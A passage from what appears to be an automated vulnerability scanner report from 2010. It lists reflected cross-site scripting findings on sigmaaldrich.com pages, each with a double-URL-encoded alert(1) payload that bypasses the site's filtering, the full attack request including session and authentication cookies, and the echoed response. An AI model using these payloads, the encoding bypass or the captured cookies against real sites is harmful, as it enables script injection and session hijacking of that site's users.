Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/22e29";alert(1)//859e850a46d","E404") ;
   </script>
...[SNIP]...

1.70. http://www.sigmaaldrich.com/configurator/servlet/DesignCenter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /configurator/servlet/DesignCenter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d06d%2522%253balert%25281%2529%252f%252f7602bb0231f was submitted in the REST URL parameter 1. This input was echoed as 5d06d";alert(1)//7602bb0231f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5d06d%2522%253balert%25281%2529%252f%252f7602bb0231f/servlet/DesignCenter HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930595442&t2=1289930595676&t3=1289930598297&t4=1289930595270&lti=1289930598297&ln=&hr=/configurator/servlet/DesignCenter&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/customer-service/services.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930595286}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:06 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/5d06d";alert(1)//7602bb0231f/servlet/DesignCenter","E404") ;
   </script>
...[SNIP]...

1.71. http://www.sigmaaldrich.com/content/safc-biosciences/en-us/home/services/scale-up-solutions [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-biosciences/en-us/home/services/scale-up-solutions

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd1d%2522%253balert%25281%2529%252f%252f58a78da8a9b was submitted in the REST URL parameter 1. This input was echoed as dfd1d";alert(1)//58a78da8a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentdfd1d%2522%253balert%25281%2529%252f%252f58a78da8a9b/safc-biosciences/en-us/home/services/scale-up-solutions HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:50 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentdfd1d";alert(1)//58a78da8a9b/safc-biosciences/en-us/home/services/scale-up-solutions","E404") ;
   </script>
...[SNIP]...

1.72. http://www.sigmaaldrich.com/content/safc-biosciences/en-us/home/services/scale-up-solutions [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-biosciences/en-us/home/services/scale-up-solutions

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3d7%2522%253balert%25281%2529%252f%252f49e75eec73 was submitted in the REST URL parameter 2. This input was echoed as db3d7";alert(1)//49e75eec73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/db3d7%2522%253balert%25281%2529%252f%252f49e75eec73/en-us/home/services/scale-up-solutions HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:53 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/db3d7";alert(1)//49e75eec73/en-us/home/services/scale-up-solutions","E404") ;
   </script>
...[SNIP]...

1.73. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/large-molecule-biologics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/large-molecule-biologics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af575%2522%253balert%25281%2529%252f%252fd3f26007b52 was submitted in the REST URL parameter 1. This input was echoed as af575";alert(1)//d3f26007b52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentaf575%2522%253balert%25281%2529%252f%252fd3f26007b52/safc-pharma/en-us/home/large-molecule-biologics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentaf575";alert(1)//d3f26007b52/safc-pharma/en-us/home/large-molecule-biologics","E404") ;
   </script>
...[SNIP]...

1.74. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/large-molecule-biologics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/large-molecule-biologics

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d7dd%2522%253balert%25281%2529%252f%252fbcdc9532a6e was submitted in the REST URL parameter 2. This input was echoed as 8d7dd";alert(1)//bcdc9532a6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/8d7dd%2522%253balert%25281%2529%252f%252fbcdc9532a6e/en-us/home/large-molecule-biologics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
